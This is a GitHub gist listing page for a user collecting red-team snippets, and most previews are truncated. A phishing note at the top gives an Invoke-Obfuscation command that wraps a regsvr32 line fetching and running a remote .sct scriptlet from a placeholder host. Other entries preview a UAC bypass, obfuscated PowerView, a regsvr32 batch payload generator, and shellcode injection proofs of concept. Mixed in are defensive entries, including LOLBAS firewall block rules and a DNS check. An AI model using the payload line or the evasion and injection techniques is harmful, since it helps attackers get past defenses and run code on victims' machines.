Skip to content

Instantly share code, notes, and snippets.

View 0xAJStrike's full-sized avatar

0xAJStrike

2 followers · 1 following
View GitHub Profile
@0xAJStrike
0xAJStrike / phishing.txt
Created August 27, 2022 13:24 — forked from adon90/phishing.txt
1. Macro Web_Delivery + Invoke-Obfuscation
Import-Module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {WEBDELIVERY_PAYLOAD} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
e.g
import-module .\Invoke-Obfuscation.psd1; Invoke-Obfuscation -ScriptBlock {regsvr32 /s /n /u /i:http://IP:8080/37yWWx.sct scrobj.dll} -Command 'TOKEN\ALL\1,1,TEST,LAUNCHER\STDIN++\2347,CLIP'
@0xAJStrike
0xAJStrike / gist:6a7253ce664e30d28bd502cf449ef265
Created August 27, 2022 13:24 — forked from curi0usJack/gist:1eef9d94a01344bddafec7434412ec66
Obfuscate Command in your Clipboard (even if base64 encoded).
function obs()
{
Import-Module Invoke-Obfuscation
$s = Get-Clipboard
if ($s -eq $null)
{
Write-Host "Clipboard is nulll."
}
@0xAJStrike
0xAJStrike / Obfuscated-PowerView-Example.psm1
Created August 27, 2022 13:22 — forked from nullbind/Obfuscated-PowerView-Example.psm1
Obfuscated-PowerView-Example.psm1
function New-InMemoryModule
{
Param
(
[Parameter(Position = 0)]
[ValidateNotNullOrEmpty()]
[String]
$ModuleName = [Guid]::NewGuid().ToString()
)
@0xAJStrike
0xAJStrike / Test-AdDnsRR.ps1
Created August 27, 2022 13:22 — forked from JaekelEDV/Test-AdDnsRR.ps1
Powershell script checking for AD-relevant DNS Resource Records in DNS
#This script checks if all AD-relevant SRV-Records exist in DNS. Also it looks for netlogon.dns and the A-Record for the DC.
$Domain = (Get-ADDomain).DNSRoot
$DCName = (Get-ADDomainController).Name
$msdcs = (Get-DnsServerResourceRecord -ZoneName _msdcs.$Domain -RRType Srv)
$ARR = (Get-DnsServerResourceRecord -ZoneName $Domain -RRType A)
$PDC = [string] "_ldap._tcp.pdc"
$GC = [string] "_ldap._tcp.gc"
$KDC = [string] "_kerberos._tcp.dc"
$DC = [string] "_ldap._tcp.dc"
@0xAJStrike
0xAJStrike / Invoke-WScriptBypassUAC.ps1
Created June 30, 2022 17:42 — forked from D3F4LT99/Invoke-WScriptBypassUAC.ps1
function Invoke-WScriptBypassUAC
{
<#
.SYNOPSIS
Performs the bypass UAC attack by abusing the lack of an embedded manifest in wscript.exe.
Author: @enigma0x3, @harmj0y, Vozzie
License: BSD 3-Clause
Required Dependencies: None
@0xAJStrike
0xAJStrike / New-RegSvr32BatchFile.ps1
Created June 30, 2022 17:42 — forked from xorrior/New-RegSvr32BatchFile.ps1
Generate a batch file to execute a dll with regsvr32
function New-RegSvr32BatchFile
{
<#
.SYNOPSIS
Generates a batch file which will contain a certutil encoded, cab compressed payload.
.DESCRIPTION
The batch file will decode and decompress the cab file, then execute the dll within with regsvr32. You may modify the bat file to execute whatever you want.
Create payload:
@0xAJStrike
0xAJStrike / Windows LOLBAS FW Block.md
Created June 30, 2022 17:41 — forked from rc-MikeDevens/Windows LOLBAS FW Block.md
Windows firewall rules to block LOLBAS

LOLBAS Firewall Block Rules

Many Windows binaries that can be abused by attackers to make undesired network connections do not need network connectivity for 'normal' functionality. With the Windows firewall, we can therefore create rules to block outbound network connections from these binaries as an additional layer of protection.

Note: Depending on your environment, these firewall rules may cause issues. Test before implementing.

These rules have been in place in my personal network without issue:

New-NetFirewallRule -DisplayName "regsvr32 block 1" -Group "LOLBAS Block" -Direction Outbound -Program "C:\Windows\System32\regsvr32.exe" -Action Block
@0xAJStrike
0xAJStrike / findhooks.cs
Created May 9, 2022 18:27
Find hooked API's using C#
using System;
using System.Runtime.InteropServices;
/* References
* 1. https://www.ired.team/offensive-security/defense-evasion/detecting-hooked-syscall-functions
* 2. https://github.com/Mr-Un1k0d3r/EDRs
*/
namespace SharpHookCheck
{
@0xAJStrike
0xAJStrike / kernelcallback.cs
Created May 9, 2022 18:27
using System;
using System.Runtime.InteropServices;
using System.Text;
namespace SendMessageKernelCallback
{
/*References:
* 1. https://t0rchwo0d.github.io/windows/Windows-Process-Injection-Technique-KernelCallbackTable/
* 2. https://modexp.wordpress.com/2019/05/25/windows-injection-finspy/
*/
@0xAJStrike
0xAJStrike / EventLogInject.cs
Created May 9, 2022 18:27
POC to inject and extract shellcode from Windows Event Logs
using System;
using System.Collections.Generic;
using System.Diagnostics;
using System.Linq;
using System.Runtime.InteropServices;
using System.Text;
using System.Threading.Tasks;
namespace HiddenEventLogs
{